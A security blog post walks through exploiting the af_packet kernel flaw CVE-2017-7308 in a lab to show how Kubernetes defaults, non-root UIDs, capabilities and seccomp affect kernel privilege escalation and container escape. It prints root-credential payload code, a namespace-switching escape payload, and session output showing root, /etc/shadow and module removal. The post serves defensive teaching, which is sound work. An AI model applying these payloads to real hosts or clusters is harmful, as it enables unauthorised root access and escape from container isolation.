
Kernel privilege escalation: how Kubernetes container isolation impacts privilege escalation attacks

Written by

Kamil Potrec

December 3, 2020


During the day, I spend my time analyzing Terraform code, Kubernetes object configuration files, and identifying common security issues. When the sun sets, I put on my hoodie, fire up Linux VMs and debuggers to look under the hood of technologies that make up the cloud native ecosystem.

In this post, we will explore how Kubernetes container isolation impacts privilege escalation attacks. We will use common kernel exploitation techniques to figure out how container abstraction layers can hinder our path to that precious root shell.

What is privilege escalation?

Privilege escalation is a term used to describe the process of obtaining more permissions to a resource. Kernel privilege escalation is a process of obtaining these permissions by exploiting a weakness in one of many kernel entry points, also referred to as attack vectors. An attack vector is simply a path which provides access to the vulnerable code.

We interact with the kernel in many ways: by reading from the file system, opening a device file, issuing system calls, or sending a packet over the network interface. All of these actions require some processing to happen in kernel space. When the kernel performs an action on behalf of a user process, we say that the kernel operates in process context. Each process is represented in the kernel by a struct task_struct. These structures are stored in a circular doubly linked list and, on the x86-64 architecture, are accessed through PER_CPU variables when a context switch happens from user space to kernel space.

A task_struct contains a cred member, a pointer to a struct cred which holds the user identifiers and capabilities associated with the process. The kernel uses this information to determine whether an action can be performed by the process, for example, whether it is allowed to execute a specific syscall. The generic goal of kernel privilege escalation is to replace or update this credentials structure to gain more permissions.

How does privilege escalation work?

The most common technique to obtain elevated permissions in kernel space is to use the combination of kernel functions [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437)([prepare_kernel_cred(0)](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682)). This can only be done once an exploit has obtained control over the instruction pointer (RIP) and successfully defeated memory access and randomization controls. [prepare_kernel_cred](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682) can generate a credentials object based on an existing one or, more generously, generate a default one with full root permissions. [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437) simply updates the task_struct of the current process with the new credentials object.

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

void get_root_payload(void) {
   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
   );
}

Kernel exploitation is a very large field, and so for this blog post, we will just explore an oversimplified version of kernel privilege escalation. There are numerous security controls in the kernel which are designed to make exploitation harder. SMEP, SMAP, KASLR, and KPTI are all mechanisms which are implemented in hardware or in the kernel and are turned on or off by the distribution you are using, or by a system administrator. There is no direct way to control these settings from Kubernetes and these are, therefore, out of scope for this post.

We will be using an old issue in the af_packet implementation, which was assigned CVE-2017-7308. The vulnerability is exploitable with the CAP_NET_RAW capability, as it requires access to raw sockets. Details of the vulnerability are exhaustively explained here, so we won’t go into them. We can obtain all the capabilities we need in an unprivileged user namespace, and on Ubuntu, access to user namespaces is not restricted by default.

dev@node1:~/exploit$ grep CONFIG_USER_NS /boot/config-4.15.0-122-generic
CONFIG_USER_NS=y
dev@node1:~/exploit$ sudo sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1
dev@node1:~/exploit$

Let’s dig in

First off, let's look at the end-to-end process in a non-containerized environment.

We need to connect the GNU Debugger (gdb) to the virtual machine's gdb stub. Once the debugger is attached, we can set a breakpoint at a convenient location. In this case, we use the mlock system call, which we can trigger manually from the exploit whenever we want to look at the internal state of the running process. Note that gdb will only break if the executing process is named “exploit”. This minimizes the risk of the breakpoint being triggered by some other process on the system. The setup tasks are conveniently scripted in a .gdb command file. We execute gdb with the -x flag to perform the setup in a consistent and repeatable way.

dev@pwnbox:/$ cat setup.gdb
set print pretty on
file vmlinux
target remote 127.0.0.1:11234
break sys_mlock if $_streq($lx_current().comm, "exploit")
continue
dev@pwnbox:/$ gdb -q -x setup.gdb
0xffffffff819c24be in native_safe_halt () at ./arch/x86/include/asm/irqflags.h:61
61  }
Breakpoint 1 at 0xffffffff8121da50: file mm/mlock.c, line 709.

Breakpoints will be triggered before the unprivileged user namespace is created, just before we trigger the vulnerability, and after we have obtained root credentials. We implement this by simply issuing the mlock syscall (number 149 on x86-64) at each point.

syscall(149, 0, 0); // Break before CLONE_NEWUSER
if (unshare(CLONE_NEWUSER) != 0) {
   perror("[-] unshare(CLONE_NEWUSER)");
   exit(EXIT_FAILURE);
}
/* OMITTED */
printf("[*] executing get root payload %p\n", &get_root_payload);
syscall(149, 0, 0); // Break before commit_creds
exploit_cve_2017_7308((void *)&get_root_payload);
printf("[*] done\n");
syscall(149, 0, 0); // Break after commit_creds

Now we can execute the exploit:

dev@node1:~/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x558abc4dd583

Our first breakpoint is triggered as expected. We can examine the cred structure with the gdb helper function $lx_current. The effective UID of the current process is 1000, and it has no effective capabilities in the current namespace, as expected.

Thread 6 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$1 = {
 usage = {counter = 4},
 uid = { val = 1000 },
 gid = { val = 1000 },
 suid = { val = 1000 },
 sgid = { val = 1000 },
 euid = { val = 1000 },
 egid = { val = 1000 },
 fsuid = { val = 1000 },
 fsgid = { val = 1000 },
 securebits = 0,
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {0, 0} },
 cap_effective = { cap = {0, 0} },
 cap_bset = { cap = {4294967295, 63} },
 cap_ambient = { cap = {0, 0} },
 jit_keyring = 0 '\000',
 session_keyring = 0xffff888331051f00,
 process_keyring = 0x0 <irq_stack_union>,
 thread_keyring = 0x0 <irq_stack_union>,
 request_key_auth = 0x0 <irq_stack_union>,
 security = 0xffff8882bb29dd60,
 user = 0xffff88832dd89f00,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 group_info = 0xffff8882b9181480,
 {
   non_rcu = 0,
   rcu = {
     next = 0x0 <irq_stack_union>,
     func = 0x0 <irq_stack_union>
   }
 }
}
(gdb)

The second breakpoint is triggered after the call to unshare, once the new user namespace has been created for the process. Observe how the UID remains unchanged, but the cap_effective and user_ns attributes have changed. Capabilities are stored as a bitmask, which is more readable in hex format.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$2 = {
 /* OMITTED */ uid = { val = 1000 },
 gid = { val = 1000 },
 /* OMITTED */ euid = { val = 1000 },
 /* OMITTED */ cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {4294967295, 63} },
 cap_effective = { cap = {4294967295, 63} },
 /* OMITTED */ user = 0xffff88832dd89f00,
 user_ns = 0xffff8882c1e0b800,
 /* OMITTED */}
(gdb) p/x 4294967295
$4 = 0xffffffff
(gdb)

Our last breakpoint is triggered after the vulnerability is exploited. Observe that the UID is now set to 0, and the user namespace is reset to init_user_ns, which represents the host’s init user namespace.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$3 = {
 /* OMITTED */ uid = { val = 0 },
 /* OMITTED */
 euid = { val = 0 },
 /* OMITTED */ cap_effective = { cap = {4294967295, 63} },
 /* OMITTED */ user = 0xffffffff82454160 <root_user>,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 group_info = 0xffffffff8245b568 <init_groups>,
 /* OMITTED */ }

Our shell returns and we now have full root permissions on the host.

dev@node1:~/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x558abc4dd583
[*] done
[+] got r00t
root@node1:/home/dev/exploit# id
uid=0(root) gid=0(root) groups=0(root)
root@node1:/home/dev/exploit#

Kernel exploit in a container

Next, we will try to execute the very same exploit inside a pod. We have created a very simple pod object definition and deployed it into the cluster.

apiVersion: v1
kind: Pod
metadata:
 name: very-default-pod
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     command: [ "sleep", "infinity" ]

Let's see what happens with the default configuration.

dev@pwnbox:/$ kubectl get nodes
NAME    STATUS   ROLES    AGE   VERSION
node1   Ready    master   8d    v1.18.10
dev@pwnbox:/$ kubectl get pods
No resources found in default namespace.
dev@pwnbox:/$ kubectl apply -f very-default-pod.yaml
pod/test created
dev@pwnbox:/$ kubectl get pods
NAME   READY   STATUS    RESTARTS   AGE
test   1/1     Running   0          4s
dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
root@test:~# id
uid=0(root) gid=0(root) groups=0(root)

Root by default

The image that we used in the demo does not specify an unprivileged user, and by default, Kubernetes will not enforce a non-root UID. So we have root access without needing to exploit the kernel at all. Let's re-run the very same exploit and break into the kernel just before it executes the vulnerable path. If you look at the effective capabilities of the process, it's clear that some are missing. The value is set to 2818844155, which represents the default capability set granted by the Docker runtime.

(gdb) p *($lx_current().cred)
$1 = {
 /* OMITTED */ euid = { val = 0 },
 /* OMITTED */ securebits = 0,
 cap_inheritable = { cap = {2818844155, 0} },
 cap_permitted = { cap = {2818844155, 0} },
 cap_effective = { cap = {2818844155, 0} },
 cap_bset = { cap = {2818844155, 0} },
 cap_ambient = { cap = {0, 0} },
 /* OMITTED */
 user = 0xffffffff82454160 <root_user>,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 /* OMITTED */ }

After the exploit completes, the effective set once again includes all of the capabilities.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$2 = {
 /* OMITTED */ securebits = 0,
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {4294967295, 63} },
 cap_effective = { cap = {4294967295, 63} },
 cap_bset = { cap = {4294967295, 63} },
 /* OMITTED */}

This time we will enforce a non-root user ID on the container by setting the runAs security context attributes.

apiVersion: v1
kind: Pod
metadata:
 name: non-root-pod
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     securityContext:
       runAsUser: 1000
       runAsGroup: 1000
     command: [ "sleep", "infinity" ]

This time we don't have root permissions out of the box. The exploit, however, performs identically, with one major difference in the final result: it appears that we have all the permissions, yet we can't see everything on the system.

dev@pwnbox:/$ kubectl apply -f non-root-uid-pod.yaml
pod/test created
dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
groups: cannot find name for group ID 1000
I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x55e55ff5a583
[*] done
[+] got r00t
root@test:/mnt/dev/exploit# id
uid=0(root) gid=0(root) groups=0(root)
root@test:/mnt/dev/exploit# cat /etc/shadow
root:*:18198:0:99999:7:::
daemon:*:18198:0:99999:7:::
bin:*:18198:0:99999:7:::
sys:*:18198:0:99999:7:::
sync:*:18198:0:99999:7:::
games:*:18198:0:99999:7:::
man:*:18198:0:99999:7:::
lp:*:18198:0:99999:7:::
mail:*:18198:0:99999:7:::
news:*:18198:0:99999:7:::
uucp:*:18198:0:99999:7:::
proxy:*:18198:0:99999:7:::
www-data:*:18198:0:99999:7:::
backup:*:18198:0:99999:7:::
list:*:18198:0:99999:7:::
irc:*:18198:0:99999:7:::
gnats:*:18198:0:99999:7:::
nobody:*:18198:0:99999:7:::
_apt:*:18198:0:99999:7:::
messagebus:*:18207:0:99999:7:::
root@test:/mnt/dev/exploit# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
   inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
   inet6 ::1/128 scope host
      valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
   link/ipip 0.0.0.0 brd 0.0.0.0
root@test:/mnt/dev/exploit#

Namespace cage

We managed to get all the capabilities and the root UID, but we only bypassed the capabilities barrier of the container: we still don't have access to the host's filesystem, we cannot see all the processes, and we cannot communicate over the host's network interfaces.

root@test:~# ls -la /dev/
total 4
drwxr-xr-x 5 root root  360 Nov 23 14:04 .
drwxr-xr-x 1 root root 4096 Nov 23 14:04 ..
lrwxrwxrwx 1 root root   11 Nov 23 14:04 core -> /proc/kcore
lrwxrwxrwx 1 root root   13 Nov 23 14:04 fd -> /proc/self/fd
crw-rw-rw- 1 root root 1, 7 Nov 23 14:04 full
drwxrwxrwt 2 root root   40 Nov 23 14:04 mqueue
crw-rw-rw- 1 root root 1, 3 Nov 23 14:04 null
lrwxrwxrwx 1 root root    8 Nov 23 14:04 ptmx -> pts/ptmx
drwxr-xr-x 2 root root    0 Nov 23 14:04 pts
crw-rw-rw- 1 root root 1, 8 Nov 23 14:04 random
drwxrwxrwt 2 root root   40 Nov 23 14:04 shm
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stderr -> /proc/self/fd/2
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdin -> /proc/self/fd/0
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdout -> /proc/self/fd/1
-rw-rw-rw- 1 root root    0 Nov 23 14:04 termination-log
crw-rw-rw- 1 root root 5, 0 Nov 23 14:04 tty
crw-rw-rw- 1 root root 1, 9 Nov 23 14:04 urandom
crw-rw-rw- 1 root root 1, 5 Nov 23 14:04 zero
root@test:~# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4532   752 ?        Ss   14:04   0:00 sleep infinity
root         7  0.0  0.0  18504  3352 pts/0    Ss   14:04   0:00 /bin/bash
root        24  0.0  0.0  34400  2776 pts/0    R+   14:04   0:00 ps aux
root@test:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
   inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
   link/ipip 0.0.0.0 brd 0.0.0.0
4: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
   link/ether 4e:52:2c:19:28:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
   inet 10.233.90.139/32 scope global eth0
      valid_lft forever preferred_lft forever
root@test:~#

At this point, we could load (or unload) any kernel module we like, but that is noisy and will trigger most basic intrusion detection systems (one would hope). To test this, we will remove an unused module. Note that your Docker image needs to have the module tools installed; in the case of Debian images, you will need to install the kmod package.

root@test:/mnt/dev/exploit# lsmod
Module                  Size  Used by
i2c_piix4              24576  0
binfmt_misc            20480  1
xt_CT                  16384  8
xt_tcpudp              16384  12
/* OMITTED */
pata_acpi              16384  0
floppy                 77824  0
root@test:/mnt/dev/exploit# rmmod i2c_piix4
root@test:/mnt/dev/exploit# lsmod | grep i2c
root@test:/mnt/dev/exploit#

Instead, we can extend our kernel exploit and point the [struct nsproxy](https://github.com/torvalds/linux/blob/master/include/linux/nsproxy.h#L31) object in the current context at the namespaces we like. Namespaces are identified by inodes, but the kernel exports the address of [init_nsproxy](https://github.com/torvalds/linux/blob/master/kernel/nsproxy.c#L32), which we can use to copy the host's init namespaces into our container.

(gdb) info address init_nsproxy
Symbol "init_nsproxy" is static storage at address 0xffffffff8245b2a0.
(gdb)

The sys_setns syscall can be used to update the namespaces of the process context. There are three primary namespaces we want to escalate into: PID, network, and mount. First, we need to obtain a reference to the root namespaces; we can do that by moving the container's PID 1 into the host's namespaces. Then we can get references to any of its namespaces from the /proc/1/ns/ directory. Finally, we move the current process into the required namespaces.

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
typedef unsigned long long __attribute__((regparm(3))) (* _find_task_by_vpid)(unsigned int vnr);
typedef void __attribute__((regparm(3))) (* _switch_task_namespaces)(void *tsk, void *new);
typedef long __attribute__((regparm(4))) (* _do_sys_open)(int fd, const char *filename, int flags, unsigned short mode);
typedef long __attribute__((regparm(3))) (* _sys_setns)(int fd, int nstype);

void get_root_payload(void) {
   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
   );
   // [1] - Identify PID 1 task in current PID namespace
   unsigned long long task = ((_find_task_by_vpid)(KERNEL_BASE + FIND_TASK_BY_VPID))(1);
   // [2] - Move PID 1 into init namespaces
   ((_switch_task_namespaces)(KERNEL_BASE + SWITCH_TASK_NS))((void *)task, (void *)(KERNEL_BASE + INIT_NSPROXY));
   // [3] - Read mount namespace inode
   long fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
   // [4] - Move current process into host’s mount namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
   // [5] - Read pid namespace inode
   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
   // [6] - Move current process into host’s pid namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
   // [7] - Read network namespace inode
   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/net", O_RDONLY, 0);
   // [8] - Move current process into host’s network namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
}

After our exploit is executed, we can access all of the interesting system resources.

I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ id
uid=1000 gid=1000 groups=1000
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x559f462d7583
[*] done
[+] got r00t
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)
root@test:/# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.0 226012  9556 ?        Ss   14:30   0:02 /sbin/init nokaslr nopti
root         2  0.0  0.0      0     0 ?        S    14:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I    14:30   0:00 [kworker/0:0]
root         4  0.0  0.0      0     0 ?        I<   14:30   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   14:30   0:00 [mm_percpu_wq]
/* OMITTED */
dev      18468  0.0  0.0   4532   724 ?        Ss   14:44   0:00 sleep infinity
dev      18642  0.0  0.0  18508  3360 pts/0    Ss   14:44   0:00 /bin/bash
root     19762  0.2  0.0   4516   752 pts/0    S    14:45   0:00 ./exploit
root     19767  0.0  0.0  18516  3412 pts/0    S    14:45   0:00 /bin/bash -i
root     19803  0.0  0.0  36708  3172 pts/0    R+   14:45   0:00 ps aux
root@test:/# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
   link/ether 52:54:00:8a:6e:73 brd ff:ff:ff:ff:ff:ff
   inet 10.100.100.80/24 brd 10.100.100.255 scope global dynamic ens3
      valid_lft 2704sec preferred_lft 2704sec
   inet6 fe80::5054:ff:fe8a:6e73/64 scope link
      valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
   link/ether 02:42:00:d6:f9:0a brd ff:ff:ff:ff:ff:ff
   inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
      valid_lft forever preferred_lft forever
4: kube-ipvs0: <BROADCAST,NOARP> mtu 1500 qdisc noop state DOWN group default
   link/ether 76:17:6a:aa:ea:9e brd ff:ff:ff:ff:ff:ff
   inet 10.233.59.218/32 brd 10.233.59.218 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.0.1/32 brd 10.233.0.1 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.0.3/32 brd 10.233.0.3 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.17.50/32 brd 10.233.17.50 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
/* OMITTED */
14: cali1037a54e65e@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
   link/ether ee:ee:ee:ee:ee:ee brd ff:ff:ff:ff:ff:ff link-netnsid 0
   inet6 fe80::ecee:eeff:feee:eeee/64 scope link
      valid_lft forever preferred_lft forever
root@test:/#
root@test:/# reboot
Failed to connect to bus: No data available

Usability of capabilities

The default capabilities assigned to Kubernetes containers (with the Docker runtime) include CAP_NET_RAW. Does this mean we would be able to exploit the vulnerability even if unprivileged user namespaces are disabled? We added code to set the effective capabilities required to reach the vulnerable code.

cap_t caps;
caps = cap_get_proc();
if (caps == NULL){
   perror("[-] Failed to get current caps");
   exit(EXIT_FAILURE);
}
cap_value_t cap_list[1];
cap_list[0] = CAP_NET_RAW;
if(cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET) == -1){
   perror("[-] Failed to set effective caps");
   exit(EXIT_FAILURE);
}
if(cap_set_proc(caps) != 0){
   perror("[-] Failed to set process caps");
   exit(EXIT_FAILURE);
}

As you can see, the exploit fails. But why?

I have no name!@test:/root$ id
uid=1000 gid=1000 groups=1000
I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[-] unshare(CLONE_NEWUSER): Operation not permitted
I have no name!@test:/mnt/dev/exploit$

This has to do with inheritable capabilities and how they are implemented. Even though the container runtime has granted these capabilities to the processes in the container, they have to be explicitly set as effective via sys_capset. At the moment, only processes with UID 0 get their capabilities made effective automatically. So, if you want to run as a non-root user but still use some of the capabilities, you need to include a setuid binary in your container to set the effective capabilities. Alternatively, you can simply set the required file capabilities on the executable and drop the container capabilities. Note that file capabilities are limited to file systems with extended attributes.

Seccomp to the rescue

Let’s now talk about attack vector reachability. Our exploit works because unprivileged users can obtain CAP_NET_RAW capability in unprivileged user namespaces. We saw how this impacts our exploit in the above discussion about capabilities. There is one more countermeasure we can use to stop this attack—and yes you can enable it via Kubernetes.

Seccomp is a mechanism which can be used to reduce the kernel's attack surface by filtering system calls. Unfortunately, by default, Kubernetes does not apply a seccomp profile to your container. This means that all system calls are allowed, subject to the permission checks already discussed. We can change that by adding an annotation to the object declaration (pre-v1.19), or by adding the seccompProfile attribute to the pod security context.

apiVersion: v1
kind: Pod
metadata:
 name: seccomp-pod
 annotations:
   seccomp.security.alpha.kubernetes.io/pod: runtime/default
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     command: [ "sleep", "infinity" ]

Let's have a look at how the default profile provided by the container runtime (in this case Docker) affects our exploit. We are greeted with an “Operation not permitted” error, because the default seccomp profile does not allow the unshare syscall.

I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[-] unshare(CLONE_NEWUSER): Operation not permitted
I have no name!@test:/mnt/dev/exploit$

Seccomp is great at limiting unnecessary kernel entry points. System calls such as unshare or userfaultfd can be safely disabled for most use cases, and blocking them stops some common exploitation techniques. But there are some calls that would be tricky to block, such as waitid. You can find these and more container exploitation techniques here.

Conclusions

We managed to prevent this exploit with the default seccomp profile. As you can see, even though the operating system is vulnerable, the exploit path is unreachable from our container (on this occasion). This technique could give you enough breathing room to plan the much-needed operating system update! You should treat these measures as defense-in-depth controls and mitigation strategies.

Always patch your systems! Snyk Infrastructure as Code can help you catch these mitigation options early on in your CI/CD pipeline, way before anything is deployed in production. We use adversarial techniques to identify high impact security options in Kubernetes, and cloud service providers. Use Snyk for free by registering for a free account.
